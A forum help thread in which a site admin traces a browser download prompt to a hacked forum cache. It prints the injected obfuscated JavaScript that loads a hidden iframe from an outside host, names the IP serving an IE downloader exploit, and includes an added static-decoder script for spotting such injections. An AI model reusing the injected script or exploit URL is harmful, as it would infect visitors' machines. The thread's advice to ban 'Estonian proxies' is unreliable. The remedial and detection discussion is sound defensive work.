Why is it trying to download this?

Highway of Life

New Member
Greetings Computer geeks!

I have a forum on my website: http://michaellewismusic.com/forum
And every time I use the Mozilla Firefox web browser, it tries to download this file:
Opening newexpl.php said:
You have chosen to open
newexpl.php
which is a: PHP Document
from: http://195.95.218.173
What should Firefox do with this file...

It does the same using the Mozilla Camino web browser, however, while using Safari, Mozilla, IE, and Netscape, it does not try to download any file.

What is this, why is it trying to download when I go to my forum, and why only Firefox and Camino?

I was able to open the file successfully using a text editor, and it seems to be a bunch of jumble with no apparent pattern, except for the header.
This is the header information for that file:
From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

Any help would be great.

Thanks,
Dave
 
More than likely, the other web browsers are downloading them, they just aren't prompting you before it downloads the file. There probably is some sort of malware embedded in that file... This is the reason why I switched over to Firefox because it catches a lot of these types of files that IE and various other browsers don't.

In order to combat this problem, I would contact your forum administrator and see what he knows about this situation and what is going on... Hopefully this helps!
 
dciscouts said:
More than likely, the other web browsers are downloading them, they just aren't prompting you before it downloads the file. There probably is some sort of malware embedded in that file... This is the reason why I switched over to Firefox because it catches a lot of these types of files that IE and various other browsers don't.

In order to combat this problem, I would contact your forum administrator and see what he knows about this situation and what is going on... Hopefully this helps!
Nope, none of the other browsers are even trying to download the file.
For one thing, Mozilla and Netscape always prompt, same as Firefox.
Safari, Camino and IE would pull up the downloads window.

I am one of the Forum admins, we have been working on the problem.
 
Here is a record of our conversation, this might be of interest to some of you.
Darth Wong said:
Somebody hacked you. That crap at the bottom of your index page source is definitely a hacker's handiwork. Perhaps your forum was out of date.

PS. This belongs in Support, not in Discussion.
Hundeforum said:
I'm afraid that the best solution is to back up your database and files, clean out everything and install 2.0.17. Also a few protective considerations for the site (depending on the host) would be to consider...

Manf
GroovePlugs said:
Thanks. Do you know how I might get rid of this?
and what "Crap" are you talking about at the bottom of the index page.
or I should say what browser are you using.

Can you email me an exact copy of what it says down there?

Thanks
Hundeforum said:
Also check the forum descs in the database as they put the rubbish in there usually...

Manf
gmex2006 said:
I guess it is a virus that is running in the background and automatically running in the background.

FAQ about the virus

MHTMLRedir!exploit
JScript/]RunRunEXE!Trojan; [JS.]MHTMLRedir!exploit; [HTML.]MHTMLRedir!exploit; [HTML.]MHTMLRedir.exploit trojan

It is a generic detection of web pages or e-mail messages which attempt to exploit the "MHTML URL Processing" vulnerability in Internet Explorer and other similar browsers.
gmex2006 said:
Only Microsoft running-programs are affected by this vulnerability. Mac OSes are not affected by this trojan.
Highway of Life said:
Here is the Javascript code they have in the footer.
Code:
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>
#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@
|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@
4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}
document.write(h);</script>

What is it, or what does it mean, and how can I get rid of it?

Thanks
Dave
Hundeforum said:
Remove that... but consider my previous post as you can't know what else they did to your forum's files.

Manf
gmex2006 said:
Highway of Life said:
Here is the Javascript code they have in the footer.
Code:
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>
#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@
|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@
4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}
document.write(h);</script>

What is it, or what does it mean, and how can I get rid of it?

Thanks
Dave

I guess that it is the javascript triggering this vulnerability.

It is embedded in every article page (in the very bottom of the source
code).

It results in a download (in case your browser is not vulnerable, other
than that it is just executed) of a file from the following URL:
http://195.95.218.173/dl/newexpl.php?adv=adv782
This server is hosted in Estonia. The file is an Internet Explorer
exploit (targeting a known XMLHTTP- and ADODB stream vulnerability)
which has been assigned the following names:

Exploit.VBS.Phel.i
VBS.Psyme.114
Trojan.Downloader.VBS.Phel.I
Trojan-Downloader.VBS.Psyme

The following may be different variants of this:
Troj/Psyme-CA
VBS/Psyme
CHM_PSYME.AG

It is a Visual Basic script and, as such, only runs on Windows platforms.

The exploit will, when executed, cause a trojan horse to be downloaded
and executed.

Just remove it. And as Hundeforum said, back up everything and install anew.
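The footer script quoted above, and gmex2006's explanation that it triggers the download, both come down to the same mechanism: a string literal whose every character code has been shifted by 3, undone at run time by `String.fromCharCode(k.charCodeAt(t++)-3)` and fed to `document.write`. A forum admin checking their templates wants to see what such a script would write into the page without letting a browser run it. The following is an added example, not code from the thread or from phpBB: it takes the obfuscated literal exactly as quoted in the thread (line breaks removed), wraps it in a constructed footer of the same shape, and decodes it statically. The function names (`shiftDecode`, `decodeShiftedWriters`) and the regular expressions are this example's own assumptions about the script's shape, not anything the thread names.

```javascript
// Added example (not from the thread). Statically decode the shift-obfuscated
// footer script without executing it, then report what it would have written.

// The obfuscated literal is copied from the thread, with line breaks removed.
const OBFUSCATED_PAYLOAD =
  '?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>' +
  '#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@' +
  '|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@' +
  '4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA';

// Constructed page footer carrying the same script shape the thread shows
// (var k='...'; charCodeAt(t++)-3; document.write(h)). Not a real page.
const SAMPLE_FOOTER =
  '</table>\n' +
  '<script language="javascript" type="text/javascript">var k=\'' +
  OBFUSCATED_PAYLOAD +
  '\',t=0,h=\'\';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}' +
  'document.write(h);</script>\n' +
  '</body></html>';

// Reverse the per-character shift the script applies at run time.
function shiftDecode(text, shift) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) - shift);
  }
  return out;
}

// Find scripts of this shape in page source and decode them without eval.
// Returns one record per match: the shift used, the decoded markup, the
// iframe src values it would inject, and whether it tries to stay invisible.
function decodeShiftedWriters(html) {
  const results = [];
  const scriptRe = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    // A single-quoted literal assigned to a var: var k='...'
    const lit = /var\s+(\w+)\s*=\s*'([^']*)'/.exec(body);
    if (!lit) continue;
    // The decoding loop: <var>.charCodeAt(<idx>++)-<shift>
    const shiftRe = new RegExp(lit[1] + '\\.charCodeAt\\(\\w+\\+\\+\\)\\s*-\\s*(\\d+)');
    const shiftMatch = shiftRe.exec(body);
    if (!shiftMatch || !/document\.write/.test(body)) continue;
    const shift = parseInt(shiftMatch[1], 10);
    const decoded = shiftDecode(lit[2], shift);
    const iframeSrcs = [];
    const iframeRe = /<iframe[^>]*\ssrc=["']?([^"'\s>]+)/gi;
    let f;
    while ((f = iframeRe.exec(decoded)) !== null) iframeSrcs.push(f[1]);
    results.push({
      shift,
      decoded,
      iframeSrcs,
      // Hidden div or 1x1 frame: the injected content is meant not to be seen.
      hidden: /visibility:\s*hidden/i.test(decoded) ||
              /(width|height)=["']?[01]\b/i.test(decoded),
    });
  }
  return results;
}

// Run over the constructed footer and print the findings.
for (const r of decodeShiftedWriters(SAMPLE_FOOTER)) {
  console.log('shift', r.shift, 'hidden', r.hidden);
  console.log('would write:', r.decoded);
  console.log('iframe src:', r.iframeSrcs);
}
```

Decoding the literal rather than running the script is the point: the decoded markup is a hidden, absolutely positioned 1x1 iframe pointing at an external host, which is what then pulls `newexpl.php` into the page. The same scan can be run over every template and cached page on the site, so the cleanup does not stop at the one footer someone happened to notice.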
Highway of Life said:
Okay, we are working on that right now.
How did they manage to gain access and put that in there, and
How do I prevent this from happening in the future?
Highway of Life said:
Hmm, cleared the Cache, and the problem seems to have disappeared.
So I assume they somehow gained access to the cache and added that to our forum.
So, how do I protect our forum from the same thing happening again?

Thanks everyone for your help.

Highway
gmex2006 said:
It is simple, the groups that usually add the redirect exploits are classified as semi-amateurs and usually, or most probably, use Estonian proxies and are hosted by three giant illegal servers found there.

So as a general rule ban, directly from your cpanel (or any gui you use for your domain) the range of free Estonian Proxies.
gmex2006 said:
Here's a list of the main proxies that hackers, most probably, targeting your site may use. At least every week check some and ban the least used proxies (the most used are used by amateurs, and "hackers" as a general rule would prefer proxies less used, which also means less chance of those proxies being banned from public networks).

http://www.multiproxy.org/anon_proxy.htm
http://www.samair.ru/proxy/
http://tools.rosinstrument.com/proxy/
http://www.checker.freeproxy.ru
http://www.proxy4free.com
http://www.publicproxyservers.com
http://www.anonymitychecker.com
http://www.proxz.com
http://www.digitalcybersoft.com/ProxyList/
GroovePlugs said:
Thanks to Xtreem Styles the problem was as easy as clicking the mouse. (Clearing the Cache)
Thanks for the help.

Oh, yes, how do I find the range of free Estonian proxies?

Highway
 
flame1117 said:
It doesn't download anything for me in Firefox on 2 PCs.
We seem to have fixed the problem now.
But I'm still not sure how they managed to gain access, or how to prevent them from gaining access again.

Any help?

Thanks,
Highway
 
I come from Estonia btw (I don't live there any more tho...). If you are talking about the FTP servers there, then they are not illegal. Their content is illegal. :D
 